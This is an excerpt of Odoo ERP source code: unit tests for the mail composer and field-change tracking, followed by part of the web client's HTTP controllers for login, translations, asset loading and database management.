'body': '<p>Mega</p>',
}).send_mail()
message = self.test_record.message_ids[0]
self.assertEqual(message.body, '<p>Mega</p>')
self.assertEqual(message.parent_id, parent)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_mass_mail(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2'})
composer = self.env['mail.compose.message'].with_context({
'default_composition_mode': 'mass_mail',
'default_model': self.test_record._name,
'default_res_id': False,
'active_ids': [self.test_record.id, test_record_2.id]
}).sudo(self.user_employee).create({
'subject': 'Testing ${object.name}',
'body': '<p>${object.name}</p>',
'partner_ids': [(4, self.partner_1.id), (4, self.partner_2.id)]
})
composer.with_context({
'default_res_id': -1,
'active_ids': [self.test_record.id, test_record_2.id]
}).send_mail()
# check mail_mail
mails = self.env['mail.mail'].search([('subject', 'ilike', 'Testing')])
for mail in mails:
self.assertEqual(mail.recipient_ids, self.partner_1 | self.partner_2,
'compose wizard: mail_mail mass mailing: mail.mail in mass mail incorrect recipients')
# check message on test_record
message1 = self.test_record.message_ids[0]
self.assertEqual(message1.subject, 'Testing %s' % self.test_record.name)
self.assertEqual(message1.body, '<p>%s</p>' % self.test_record.name)
# check message on test_record_2
message1 = test_record_2.message_ids[0]
self.assertEqual(message1.subject, 'Testing %s' % test_record_2.name)
self.assertEqual(message1.body, '<p>%s</p>' % test_record_2.name)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_mass_mail_active_domain(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2'})
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'mass_mail',
'default_model': self.test_record._name,
'default_use_active_domain': True,
'active_ids': [self.test_record.id],
'active_domain': [('name', 'in', ['%s' % self.test_record.name, '%s' % test_record_2.name])],
}).sudo(self.user_employee).create({
'subject': 'From Composer Test',
'body': '${object.name}',
}).send_mail()
self.assertEqual(self.test_record.message_ids[0].subject, 'From Composer Test')
self.assertEqual(test_record_2.message_ids[0].subject, 'From Composer Test')
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_message_compose_mass_mail_no_active_domain(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2'})
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'mass_mail',
'default_model': self.test_record._name,
'default_use_active_domain': False,
'active_ids': [self.test_record.id],
'active_domain': [('name', 'in', ['%s' % self.test_record.name, '%s' % test_record_2.name])],
}).sudo(self.user_employee).create({
'subject': 'From Composer Test',
'body': '${object.name}',
}).send_mail()
self.assertEqual(self.test_record.message_ids[0].subject, 'From Composer Test')
self.assertFalse(test_record_2.message_ids.ids)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_message_compose_portal_ok(self):
portal_user = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='Chell Gladys')
with patch.object(MailTestSimple, 'check_access_rights', return_value=True):
ComposerPortal = self.env['mail.compose.message'].sudo(portal_user)
ComposerPortal.with_context({
'default_composition_mode': 'comment',
'default_model': self.test_record._name,
'default_res_id': self.test_record.id,
}).create({
'subject': 'Subject',
'body': '<p>Body text</p>',
'partner_ids': []}).send_mail()
self.assertEqual(self.test_record.message_ids[0].body, '<p>Body text</p>')
self.assertEqual(self.test_record.message_ids[0].author_id, portal_user.partner_id)
ComposerPortal.with_context({
'default_composition_mode': 'comment',
'default_parent_id': self.test_record.message_ids.ids[0],
}).create({
'subject': 'Subject',
'body': '<p>Body text 2</p>'}).send_mail()
self.assertEqual(self.test_record.message_ids[0].body, '<p>Body text 2</p>')
self.assertEqual(self.test_record.message_ids[0].author_id, portal_user.partner_id)
```
#### File: test_mail/tests/test_message_track.py
```python
from email.utils import formataddr
from odoo.addons.test_mail.tests import common
class TestTracking(common.BaseFunctionalTest, common.MockEmails):
def assertTracking(self, message, data):
tracking_values = message.sudo().tracking_value_ids
for field_name, value_type, old_value, new_value in data:
tracking = tracking_values.filtered(lambda track: track.field == field_name)
self.assertEqual(len(tracking), 1)
if value_type in ('char', 'integer'):
self.assertEqual(tracking.old_value_char, old_value)
self.assertEqual(tracking.new_value_char, new_value)
elif value_type in ('many2one'):
self.assertEqual(tracking.old_value_integer, old_value and old_value.id or False)
self.assertEqual(tracking.new_value_integer, new_value and new_value.id or False)
self.assertEqual(tracking.old_value_char, old_value and old_value.name_get()[0][1] or '')
self.assertEqual(tracking.new_value_char, new_value and new_value.name_get()[0][1] or '')
else:
self.assertEqual(1, 0)
def setUp(self):
super(TestTracking, self).setUp()
record = self.env['mail.test.full'].sudo(self.user_employee).with_context(common.BaseFunctionalTest._test_context).create({
'name': 'Test',
})
self.record = record.with_context(mail_notrack=False)
def test_message_track_no_tracking(self):
""" Update a set of non tracked fields -> no message, no tracking """
self.record.write({
'name': 'Tracking or not',
'count': 32,
})
self.assertEqual(self.record.message_ids, self.env['mail.message'])
def test_message_track_no_subtype(self):
""" Update some tracked fields not linked to some subtype -> message with onchange """
customer = self.env['res.partner'].create({'name': 'Customer', 'email': '<EMAIL>'})
self.record.write({
'name': 'Test2',
'customer_id': customer.id,
})
# one new message containing tracking; without subtype linked to tracking, a note is generated
self.assertEqual(len(self.record.message_ids), 1)
self.assertEqual(self.record.message_ids.subtype_id, self.env.ref('mail.mt_note'))
# no specific recipients except those following notes, no email
self.assertEqual(self.record.message_ids.partner_ids, self.env['res.partner'])
self.assertEqual(self.record.message_ids.needaction_partner_ids, self.env['res.partner'])
self.assertEqual(self._mails, [])
# verify tracked value
self.assertTracking(
self.record.message_ids,
[('customer_id', 'many2one', False, customer) # onchange tracked field
])
def test_message_track_subtype(self):
""" Update some tracked fields linked to some subtype -> message with onchange """
self.record.message_subscribe(
partner_ids=[self.user_admin.partner_id.id],
subtype_ids=[self.env.ref('test_mail.st_mail_test_full_umbrella_upd').id]
)
umbrella = self.env['mail.test'].with_context(mail_create_nosubscribe=True).create({'name': 'Umbrella'})
self.record.write({
'name': 'Test2',
'email_from': '<EMAIL>',
'umbrella_id': umbrella.id,
})
# one new message containing tracking; subtype linked to tracking
self.assertEqual(len(self.record.message_ids), 1)
self.assertEqual(self.record.message_ids.subtype_id, self.env.ref('test_mail.st_mail_test_full_umbrella_upd'))
# no specific recipients except those following umbrella
self.assertEqual(self.record.message_ids.partner_ids, self.env['res.partner'])
self.assertEqual(self.record.message_ids.needaction_partner_ids, self.user_admin.partner_id)
# verify tracked value
self.assertTracking(
self.record.message_ids,
[('umbrella_id', 'many2one', False, umbrella) # onchange tracked field
])
def test_message_track_template(self):
""" Update some tracked fields linked to some template -> message with onchange """
self.record.write({'mail_template': self.env.ref('test_mail.mail_test_full_tracking_tpl').id})
self.assertEqual(self.record.message_ids, self.env['mail.message'])
self.record.write({
'name': 'Test2',
'customer_id': self.user_admin.partner_id.id,
})
self.assertEqual(len(self.record.message_ids), 2, 'should have 2 new messages: one for tracking, one for template')
# one new message containing the template linked to tracking
self.assertEqual(self.record.message_ids[0].subject, 'Test Template')
self.assertEqual(self.record.message_ids[0].body, '<p>Hello Test2</p>')
# one email send due to template
self.assertEqual(len(self._mails), 1)
self.assertEqual(set(self._mails[0]['email_to']), set([formataddr((self.user_admin.name, self.user_admin.email))]))
self.assertHtmlEqual(self._mails[0]['body'], '<p>Hello Test2</p>')
# one new message containing tracking; without subtype linked to tracking
self.assertEqual(self.record.message_ids[1].subtype_id, self.env.ref('mail.mt_note'))
self.assertTracking(
self.record.message_ids[1],
[('customer_id', 'many2one', False, self.user_admin.partner_id) # onchange tracked field
])
def test_message_track_sequence(self):
""" Update some tracked fields and check that the mail.tracking.value are ordered according to their track_sequence"""
self.record.write({
'name': 'Zboub',
'customer_id': self.user_admin.partner_id.id,
'user_id': self.user_admin.id,
'umbrella_id': self.env['mail.test'].with_context(mail_create_nosubscribe=True).create({'name': 'Umbrella'}).id
})
self.assertEqual(len(self.record.message_ids), 1, 'should have 1 tracking message')
tracking_values = self.env['mail.tracking.value'].search([('mail_message_id', '=', self.record.message_ids.id)])
self.assertEqual(tracking_values[0].track_sequence, 1)
self.assertEqual(tracking_values[1].track_sequence, 2)
self.assertEqual(tracking_values[2].track_sequence, 100)
```
#### File: web/controllers/main.py
```python
import babel.messages.pofile
import base64
import datetime
import functools
import glob
import hashlib
import imghdr
import io
import itertools
import jinja2
import json
import logging
import operator
import os
import re
import sys
import tempfile
import time
import zlib
import werkzeug
import werkzeug.exceptions
import werkzeug.utils
import werkzeug.wrappers
import werkzeug.wsgi
from collections import OrderedDict
from werkzeug.urls import url_decode, iri_to_uri
from xml.etree import ElementTree
import unicodedata
import odoo
import odoo.modules.registry
from odoo.api import call_kw, Environment
from odoo.modules import get_resource_path
from odoo.tools import crop_image, topological_sort, html_escape, pycompat
from odoo.tools.mimetypes import guess_mimetype
from odoo.tools.translate import _
from odoo.tools.misc import str2bool, xlwt, file_open
from odoo.tools.safe_eval import safe_eval
from odoo import http
from odoo.http import content_disposition, dispatch_rpc, request, \
serialize_exception as _serialize_exception, Response
from odoo.exceptions import AccessError, UserError, AccessDenied
from odoo.models import check_method_name
from odoo.service import db, security
_logger = logging.getLogger(__name__)
if hasattr(sys, 'frozen'):
# When running on compiled windows binary, we don't have access to package loader.
path = os.path.realpath(os.path.join(os.path.dirname(__file__), '..', 'views'))
loader = jinja2.FileSystemLoader(path)
else:
loader = jinja2.PackageLoader('odoo.addons.web', "views")
env = jinja2.Environment(loader=loader, autoescape=True)
env.filters["json"] = json.dumps
# 1 week cache for asset bundles as advised by Google Page Speed
BUNDLE_MAXAGE = 60 * 60 * 24 * 7
DBNAME_PATTERN = '^[a-zA-Z0-9][a-zA-Z0-9_.-]+$'
#----------------------------------------------------------
# Odoo Web helpers
#----------------------------------------------------------
db_list = http.db_list
db_monodb = http.db_monodb
def serialize_exception(f):
@functools.wraps(f)
def wrap(*args, **kwargs):
try:
return f(*args, **kwargs)
except Exception as e:
_logger.exception("An exception occured during an http request")
se = _serialize_exception(e)
error = {
'code': 200,
'message': "Odoo Server Error",
'data': se
}
return werkzeug.exceptions.InternalServerError(json.dumps(error))
return wrap
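# Illustrative usage sketch (not part of the original controller; route and method
# names below are hypothetical): serialize_exception is meant to decorate http
# routes that stream data, so an unexpected crash is returned as a JSON error
# payload (HTTP 500) instead of a raw traceback page:
#
#     @http.route('/web/example/download', type='http', auth='user')
#     @serialize_exception
#     def example_download(self, **kwargs):
#         return request.make_response(b'...')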
def redirect_with_hash(*args, **kw):
"""
.. deprecated:: 8.0
Use the ``http.redirect_with_hash()`` function instead.
"""
return http.redirect_with_hash(*args, **kw)
def abort_and_redirect(url):
r = request.httprequest
response = werkzeug.utils.redirect(url, 302)
response = r.app.get_response(r, response, explicit_session=False)
werkzeug.exceptions.abort(response)
def ensure_db(redirect='/web/database/selector'):
    # This helper should be used in web client auth="none" routes
    # if those routes need a db to work with.
    # If the heuristic does not find any database, the user will be
    # redirected to the db selector or to any url specified by the `redirect` argument.
    # If the db is taken out of a query parameter, it will be checked against
    # `http.db_filter()` in order to ensure it is legitimate and thus avoid db
    # forgery that could lead to xss attacks.
db = request.params.get('db') and request.params.get('db').strip()
# Ensure db is legit
if db and db not in http.db_filter([db]):
db = None
if db and not request.session.db:
        # The user asked for a specific database on a new session.
        # That means the nodb router has been used to find the route.
        # Depending on the modules installed in the database, the rendering of the page
        # may depend on data injected by the database route dispatcher.
        # Thus, we redirect the user to the same page but with the session cookie set.
        # This will force using the database route dispatcher...
r = request.httprequest
url_redirect = werkzeug.urls.url_parse(r.base_url)
if r.query_string:
# in P3, request.query_string is bytes, the rest is text, can't mix them
query_string = iri_to_uri(r.query_string)
url_redirect = url_redirect.replace(query=query_string)
request.session.db = db
abort_and_redirect(url_redirect)
# if db not provided, use the session one
if not db and request.session.db and http.db_filter([request.session.db]):
db = request.session.db
# if no database provided and no database in session, use monodb
if not db:
db = db_monodb(request.httprequest)
# if no db can be found til here, send to the database selector
# the database selector will redirect to database manager if needed
if not db:
werkzeug.exceptions.abort(werkzeug.utils.redirect(redirect, 303))
# always switch the session to the computed db
if db != request.session.db:
request.session.logout()
abort_and_redirect(request.httprequest.url)
request.session.db = db
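# Usage sketch (assumption, mirroring the routes further below such as /web):
# ensure_db() is called at the top of an auth="none" HTTP route; after it returns,
# request.session.db points at a legitimate database, otherwise the user has
# already been redirected:
#
#     @http.route('/web/example', type='http', auth='none')   # hypothetical route
#     def example(self, **kw):
#         ensure_db()
#         # request.session.db is now safe to use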
def module_installed(environment):
    # Candidate modules: the current heuristic is the presence of a /static dir
loadable = list(http.addons_manifest)
# Retrieve database installed modules
# TODO The following code should move to ir.module.module.list_installed_modules()
Modules = environment['ir.module.module']
domain = [('state','=','installed'), ('name','in', loadable)]
modules = OrderedDict(
(module.name, module.dependencies_id.mapped('name'))
for module in Modules.search(domain)
)
sorted_modules = topological_sort(modules)
return sorted_modules
def module_installed_bypass_session(dbname):
try:
registry = odoo.registry(dbname)
with registry.cursor() as cr:
return module_installed(
environment=Environment(cr, odoo.SUPERUSER_ID, {}))
except Exception:
pass
return {}
def module_boot(db=None):
server_wide_modules = odoo.conf.server_wide_modules or []
serverside = ['base', 'web']
dbside = []
for i in server_wide_modules:
if i in http.addons_manifest and i not in serverside:
serverside.append(i)
monodb = db or db_monodb()
if monodb:
dbside = module_installed_bypass_session(monodb)
dbside = [i for i in dbside if i not in serverside]
addons = serverside + dbside
return addons
def concat_xml(file_list):
"""Concatenate xml files
:param list(str) file_list: list of files to check
:returns: (concatenation_result, checksum)
:rtype: (bytes, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return b'', checksum.hexdigest()
root = None
for fname in file_list:
with open(fname, 'rb') as fp:
contents = fp.read()
checksum.update(contents)
fp.seek(0)
try:
xml = ElementTree.parse(fp).getroot()
except ElementTree.ParseError as e:
_logger.error("Could not parse file %s: %s" % (fname, e.msg))
raise e
if root is None:
root = ElementTree.Element(xml.tag)
#elif root.tag != xml.tag:
        #    raise ValueError("Root tags mismatch: %r != %r" % (root.tag, xml.tag))
for child in xml.getchildren():
root.append(child)
return ElementTree.tostring(root, 'utf-8'), checksum.hexdigest()
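# Illustrative sketch (file names are made up): given two qweb files that each have a
# <templates> root, concat_xml returns one <templates> document containing the
# children of both files, together with a sha1 hex digest of the raw file contents:
#
#     content, checksum = concat_xml(['a.xml', 'b.xml'])
#     # content  -> b'<templates>...templates of a.xml... ...templates of b.xml...</templates>'
#     # checksum -> '<40-char sha1 hexdigest of the concatenated raw bytes>'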
def fs2web(path):
"""convert FS path into web path"""
return '/'.join(path.split(os.path.sep))
def manifest_glob(extension, addons=None, db=None, include_remotes=False):
if addons is None:
addons = module_boot(db=db)
else:
addons = addons.split(',')
r = []
for addon in addons:
manifest = http.addons_manifest.get(addon, None)
if not manifest:
continue
        # ensure the path does not end with /
addons_path = os.path.join(manifest['addons_path'], '')[:-1]
globlist = manifest.get(extension, [])
for pattern in globlist:
if pattern.startswith(('http://', 'https://', '//')):
if include_remotes:
r.append((None, pattern))
else:
for path in glob.glob(os.path.normpath(os.path.join(addons_path, addon, pattern))):
r.append((path, fs2web(path[len(addons_path):])))
return r
def manifest_list(extension, mods=None, db=None, debug=None):
""" list resources to load specifying either:
mods: a comma separated string listing modules
db: a database name (return all installed modules in that database)
"""
if debug is not None:
_logger.warning("odoo.addons.web.main.manifest_list(): debug parameter is deprecated")
files = manifest_glob(extension, addons=mods, db=db, include_remotes=True)
return [wp for _fp, wp in files]
def get_last_modified(files):
""" Returns the modification time of the most recently modified
file provided
:param list(str) files: names of files to check
:return: most recent modification time amongst the fileset
:rtype: datetime.datetime
"""
files = list(files)
if files:
return max(datetime.datetime.fromtimestamp(os.path.getmtime(f))
for f in files)
return datetime.datetime(1970, 1, 1)
def make_conditional(response, last_modified=None, etag=None, max_age=0):
""" Makes the provided response conditional based upon the request,
and mandates revalidation from clients
Uses Werkzeug's own :meth:`ETagResponseMixin.make_conditional`, after
setting ``last_modified`` and ``etag`` correctly on the response object
:param response: Werkzeug response
:type response: werkzeug.wrappers.Response
:param datetime.datetime last_modified: last modification date of the response content
:param str etag: some sort of checksum of the content (deep etag)
:return: the response object provided
:rtype: werkzeug.wrappers.Response
"""
response.cache_control.must_revalidate = True
response.cache_control.max_age = max_age
if last_modified:
response.last_modified = last_modified
if etag:
response.set_etag(etag)
return response.make_conditional(request.httprequest)
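# Usage sketch (mirrors the /web/webclient/qweb route further below): wrap a freshly
# built response so clients must revalidate it against Last-Modified / ETag:
#
#     response = make_conditional(
#         request.make_response(content, [('Content-Type', 'text/xml')]),
#         last_modified, checksum)
#     # adds Cache-Control: must-revalidate, max-age=0 plus the validators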
def login_and_redirect(db, login, key, redirect_url='/web'):
request.session.authenticate(db, login, key)
return set_cookie_and_redirect(redirect_url)
def set_cookie_and_redirect(redirect_url):
redirect = werkzeug.utils.redirect(redirect_url, 303)
redirect.autocorrect_location_header = False
return redirect
def clean_action(action):
action.setdefault('flags', {})
action_type = action.setdefault('type', 'ir.actions.act_window_close')
if action_type == 'ir.actions.act_window':
return fix_view_modes(action)
return action
# I think generate_views,fix_view_modes should go into js ActionManager
def generate_views(action):
"""
While the server generates a sequence called "views" computing dependencies
    between the various views of actions coming directly from the database
    (the ``ir.actions.act_window`` model), it's also possible for e.g. buttons
to return custom view dictionaries generated on the fly.
In that case, there is no ``views`` key available on the action.
Since the web client relies on ``action['views']``, generate it here from
``view_mode`` and ``view_id``.
Currently handles two different cases:
* no view_id, multiple view_mode
* single view_id, single view_mode
:param dict action: action descriptor dictionary to generate a views key for
"""
view_id = action.get('view_id') or False
if isinstance(view_id, (list, tuple)):
view_id = view_id[0]
# providing at least one view mode is a requirement, not an option
view_modes = action['view_mode'].split(',')
if len(view_modes) > 1:
if view_id:
raise ValueError('Non-db action dictionaries should provide '
'either multiple view modes or a single view '
'mode and an optional view id.\n\n Got view '
'modes %r and view id %r for action %r' % (
view_modes, view_id, action))
action['views'] = [(False, mode) for mode in view_modes]
return
action['views'] = [(view_id, view_modes[0])]
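# Illustrative sketch of the two supported cases (action values are made up):
#
#     action = {'view_mode': 'tree,form'}            # no view_id, multiple view modes
#     generate_views(action)
#     # action['views'] == [(False, 'tree'), (False, 'form')]
#
#     action = {'view_mode': 'form', 'view_id': 42}  # single view_id, single view mode
#     generate_views(action)
#     # action['views'] == [(42, 'form')]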
def fix_view_modes(action):
""" For historical reasons, Odoo has weird dealings in relation to
view_mode and the view_type attribute (on window actions):
* one of the view modes is ``tree``, which stands for both list views
and tree views
* the choice is made by checking ``view_type``, which is either
``form`` for a list view or ``tree`` for an actual tree view
    This method simply folds the view_type into view_mode by adding a
new view mode ``list`` which is the result of the ``tree`` view_mode
in conjunction with the ``form`` view_type.
TODO: this should go into the doc, some kind of "peculiarities" section
:param dict action: an action descriptor
:returns: nothing, the action is modified in place
"""
if not action.get('views'):
generate_views(action)
if action.pop('view_type', 'form') != 'form':
return action
if 'view_mode' in action:
action['view_mode'] = ','.join(
mode if mode != 'tree' else 'list'
for mode in action['view_mode'].split(','))
action['views'] = [
[id, mode if mode != 'tree' else 'list']
for id, mode in action['views']
]
return action
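# Illustrative sketch (made-up window action): with the legacy view_type 'form', the
# 'tree' view mode is folded into the web client's 'list' mode:
#
#     action = {'type': 'ir.actions.act_window',
#               'view_type': 'form', 'view_mode': 'tree,form'}
#     clean_action(action)
#     # action['view_mode'] == 'list,form'
#     # action['views'] == [[False, 'list'], [False, 'form']]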
def _local_web_translations(trans_file):
messages = []
try:
with open(trans_file) as t_file:
po = babel.messages.pofile.read_po(t_file)
except Exception:
return
for x in po:
if x.id and x.string and "openerp-web" in x.auto_comments:
messages.append({'id': x.id, 'string': x.string})
return messages
def xml2json_from_elementtree(el, preserve_whitespaces=False):
""" xml2json-direct
Simple and straightforward XML-to-JSON converter in Python
New BSD Licensed
http://code.google.com/p/xml2json-direct/
"""
res = {}
if el.tag[0] == "{":
ns, name = el.tag.rsplit("}", 1)
res["tag"] = name
res["namespace"] = ns[1:]
else:
res["tag"] = el.tag
res["attrs"] = {}
for k, v in el.items():
res["attrs"][k] = v
kids = []
if el.text and (preserve_whitespaces or el.text.strip() != ''):
kids.append(el.text)
for kid in el:
kids.append(xml2json_from_elementtree(kid, preserve_whitespaces))
if kid.tail and (preserve_whitespaces or kid.tail.strip() != ''):
kids.append(kid.tail)
res["children"] = kids
return res
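# Illustrative sketch (assumed input): for a fragment such as <a x="1">hi<b/></a>,
# the converter yields roughly
#
#     {'tag': 'a', 'attrs': {'x': '1'},
#      'children': ['hi', {'tag': 'b', 'attrs': {}, 'children': []}]}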
def binary_content(xmlid=None, model='ir.attachment', id=None, field='datas', unique=False,
filename=None, filename_field='datas_fname', download=False, mimetype=None,
default_mimetype='application/octet-stream', related_id=None, access_mode=None, access_token=None,
env=None):
return request.registry['ir.http'].binary_content(
xmlid=xmlid, model=model, id=id, field=field, unique=unique, filename=filename,
filename_field=filename_field, download=download, mimetype=mimetype,
default_mimetype=default_mimetype, related_id=related_id, access_mode=access_mode, access_token=access_token,
env=env)
#----------------------------------------------------------
# Odoo Web web Controllers
#----------------------------------------------------------
class Home(http.Controller):
@http.route('/', type='http', auth="none")
def index(self, s_action=None, db=None, **kw):
return http.local_redirect('/web', query=request.params, keep_hash=True)
    # ideally, this route should be `auth="user"` but that doesn't work in non-monodb mode.
@http.route('/web', type='http', auth="none")
def web_client(self, s_action=None, **kw):
ensure_db()
if not request.session.uid:
return werkzeug.utils.redirect('/web/login', 303)
if kw.get('redirect'):
return werkzeug.utils.redirect(kw.get('redirect'), 303)
request.uid = request.session.uid
try:
context = request.env['ir.http'].webclient_rendering_context()
response = request.render('web.webclient_bootstrap', qcontext=context)
response.headers['X-Frame-Options'] = 'DENY'
return response
except AccessError:
return werkzeug.utils.redirect('/web/login?error=access')
@http.route('/web/dbredirect', type='http', auth="none")
def web_db_redirect(self, redirect='/', **kw):
ensure_db()
return werkzeug.utils.redirect(redirect, 303)
def _login_redirect(self, uid, redirect=None):
return redirect if redirect else '/web'
@http.route('/web/login', type='http', auth="none", sitemap=False)
def web_login(self, redirect=None, **kw):
ensure_db()
request.params['login_success'] = False
if request.httprequest.method == 'GET' and redirect and request.session.uid:
return http.redirect_with_hash(redirect)
if not request.uid:
request.uid = odoo.SUPERUSER_ID
values = request.params.copy()
try:
values['databases'] = http.db_list()
except odoo.exceptions.AccessDenied:
values['databases'] = None
if request.httprequest.method == 'POST':
old_uid = request.uid
try:
uid = request.session.authenticate(request.session.db, request.params['login'], request.params['password'])
request.params['login_success'] = True
return http.redirect_with_hash(self._login_redirect(uid, redirect=redirect))
except odoo.exceptions.AccessDenied as e:
request.uid = old_uid
if e.args == odoo.exceptions.AccessDenied().args:
values['error'] = _("Wrong login/password")
else:
values['error'] = e.args[0]
else:
if 'error' in request.params and request.params.get('error') == 'access':
values['error'] = _('Only employee can access this database. Please contact the administrator.')
if 'login' not in values and request.session.get('auth_login'):
values['login'] = request.session.get('auth_login')
if not odoo.tools.config['list_db']:
values['disable_database_manager'] = True
# otherwise no real way to test debug mode in template as ?debug =>
# values['debug'] = '' but that's also the fallback value when
# missing variables in qweb
if 'debug' in values:
values['debug'] = True
response = request.render('web.login', values)
response.headers['X-Frame-Options'] = 'DENY'
return response
@http.route('/web/become', type='http', auth='user', sitemap=False)
def switch_to_admin(self):
uid = request.env.user.id
if request.env.user._is_system():
uid = request.session.uid = odoo.SUPERUSER_ID
request.env['res.users']._invalidate_session_cache()
request.session.session_token = security.compute_session_token(request.session, request.env)
return http.local_redirect(self._login_redirect(uid), keep_hash=True)
class WebClient(http.Controller):
@http.route('/web/webclient/csslist', type='json', auth="none")
def csslist(self, mods=None):
return manifest_list('css', mods=mods)
@http.route('/web/webclient/jslist', type='json', auth="none")
def jslist(self, mods=None):
return manifest_list('js', mods=mods)
@http.route('/web/webclient/locale/<string:lang>', type='http', auth="none")
def load_locale(self, lang):
magic_file_finding = [lang.replace("_", '-').lower(), lang.split('_')[0]]
for code in magic_file_finding:
try:
return http.Response(
werkzeug.wsgi.wrap_file(
request.httprequest.environ,
file_open('web/static/lib/moment/locale/%s.js' % code, 'rb')
),
content_type='application/javascript; charset=utf-8',
headers=[('Cache-Control', 'max-age=36000')],
direct_passthrough=True,
)
except IOError:
_logger.debug("No moment locale for code %s", code)
return request.make_response("", headers=[
('Content-Type', 'application/javascript'),
('Cache-Control', 'max-age=36000'),
])
@http.route('/web/webclient/qweb', type='http', auth="none", cors="*")
def qweb(self, mods=None, db=None):
files = [f[0] for f in manifest_glob('qweb', addons=mods, db=db)]
last_modified = get_last_modified(files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_xml(files)
return make_conditional(
request.make_response(content, [('Content-Type', 'text/xml')]),
last_modified, checksum)
@http.route('/web/webclient/bootstrap_translations', type='json', auth="none")
def bootstrap_translations(self, mods):
""" Load local translations from *.po files, as a temporary solution
until we have established a valid session. This is meant only
for translating the login page and db management chrome, using
the browser's language. """
# For performance reasons we only load a single translation, so for
# sub-languages (that should only be partially translated) we load the
# main language PO instead - that should be enough for the login screen.
lang = request.lang.split('_')[0]
translations_per_module = {}
for addon_name in mods:
if http.addons_manifest[addon_name].get('bootstrap'):
addons_path = http.addons_manifest[addon_name]['addons_path']
f_name = os.path.join(addons_path, addon_name, "i18n", lang + ".po")
if not os.path.exists(f_name):
continue
translations_per_module[addon_name] = {'messages': _local_web_translations(f_name)}
return {"modules": translations_per_module,
"lang_parameters": None}
@http.route('/web/webclient/translations', type='json', auth="none")
def translations(self, mods=None, lang=None):
request.disable_db = False
if mods is None:
mods = [x['name'] for x in request.env['ir.module.module'].sudo().search_read(
[('state', '=', 'installed')], ['name'])]
if lang is None:
lang = request.context["lang"]
langs = request.env['res.lang'].sudo().search([("code", "=", lang)])
lang_params = None
if langs:
lang_params = langs.read([
"name", "direction", "date_format", "time_format",
"grouping", "decimal_point", "thousands_sep", "week_start"])[0]
# Regional languages (ll_CC) must inherit/override their parent lang (ll), but this is
# done server-side when the language is loaded, so we only need to load the user's lang.
translations_per_module = {}
messages = request.env['ir.translation'].sudo().search_read([
('module', 'in', mods), ('lang', '=', lang),
('comments', 'like', 'openerp-web'), ('value', '!=', False),
('value', '!=', '')],
['module', 'src', 'value', 'lang'], order='module')
for mod, msg_group in itertools.groupby(messages, key=operator.itemgetter('module')):
translations_per_module.setdefault(mod, {'messages': []})
translations_per_module[mod]['messages'].extend({
'id': m['src'],
'string': m['value']}
for m in msg_group)
return {
'lang_parameters': lang_params,
'modules': translations_per_module,
'multi_lang': len(request.env['res.lang'].sudo().get_installed()) > 1,
}
@http.route('/web/webclient/version_info', type='json', auth="none")
def version_info(self):
return odoo.service.common.exp_version()
@http.route('/web/tests', type='http', auth="user")
def test_suite(self, mod=None, **kwargs):
return request.render('web.qunit_suite')
@http.route('/web/tests/mobile', type='http', auth="none")
def test_mobile_suite(self, mod=None, **kwargs):
return request.render('web.qunit_mobile_suite')
@http.route('/web/benchmarks', type='http', auth="none")
def benchmarks(self, mod=None, **kwargs):
return request.render('web.benchmark_suite')
class Proxy(http.Controller):
@http.route('/web/proxy/load', type='json', auth="none")
def load(self, path):
""" Proxies an HTTP request through a JSON request.
It is strongly recommended to not request binary files through this,
as the result will be a binary data blob as well.
:param path: actual request path
:return: file content
"""
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
base_url = request.httprequest.base_url
return Client(request.httprequest.app, BaseResponse).get(path, base_url=base_url).data
@http.route('/web/proxy/post/<path:path>', type='http', auth='user', methods=['GET'])
def post(self, path):
"""Effectively execute a POST request that was hooked through user login"""
with request.session.load_request_data() as data:
if not data:
raise werkzeug.exceptions.BadRequest()
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
base_url = request.httprequest.base_url
query_string = request.httprequest.query_string
client = Client(request.httprequest.app, BaseResponse)
headers = {'X-Openerp-Session-Id': request.session.sid}
return client.post('/' + path, base_url=base_url, query_string=query_string,
headers=headers, data=data)
class Database(http.Controller):
def _render_template(self, **d):
d.setdefault('manage',True)
d['insecure'] = odoo.tools.config.verify_admin_password('<PASSWORD>')
d['list_db'] = odoo.tools.config['list_db']
d['langs'] = odoo.service.db.exp_list_lang()
d['countries'] = odoo.service.db.exp_list_countries()
d['pattern'] = DBNAME_PATTERN
# databases list
d['databases'] = []
try:
d['databases'] = http.db_list()
d['incompatible_databases'] = odoo.service.db.list_db_incompatible(d['databases'])
except odoo.exceptions.AccessDenied:
monodb = db_monodb()
if monodb:
d['databases'] = [monodb]
return env.get_template("database_manager.html").render(d)
@http.route('/web/database/selector', type='http', auth="none")
def selector(self, **kw):
request._cr = None
return self._render_template(manage=False)
@http.route('/web/database/manager', type='http', auth="none")
def manager(self, **kw):
request._cr = None
return self._render_template()
@http.route('/web/database/create', type='http', auth="none", methods=['POST'], csrf=False)
def create(self, master_pwd, name, lang, password, **post):
try:
if not re.match(DBNAME_PATTERN, name):
raise Exception(_('Invalid database name. Only alphanumerical characters, underscore, hyphen and dot are allowed.'))
            # country code could be the string "False", which is truthy in Python
country_code = post.get('country_code') or False
dispatch_rpc('db', 'create_database', [master_pwd, name, bool(post.get('demo')), lang, password, post['login'], country_code, post['phone']])
request.session.authenticate(name, post['login'], password)
return http.local_redirect('/web/')
except Exception as e:
error = "Database creation error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/duplicate', type='http', auth="none", methods=['POST'], csrf=False)
def duplicate(self, master_pwd, name, new_name):
try:
if not re.match(DBNAME_PATTERN, new_name):
raise Exception(_('Invalid database name. Only alphanumerical characters, underscore, hyphen and dot are allowed.'))
dispatch_rpc('db', 'duplicate_database', [master_pwd, name, new_name])
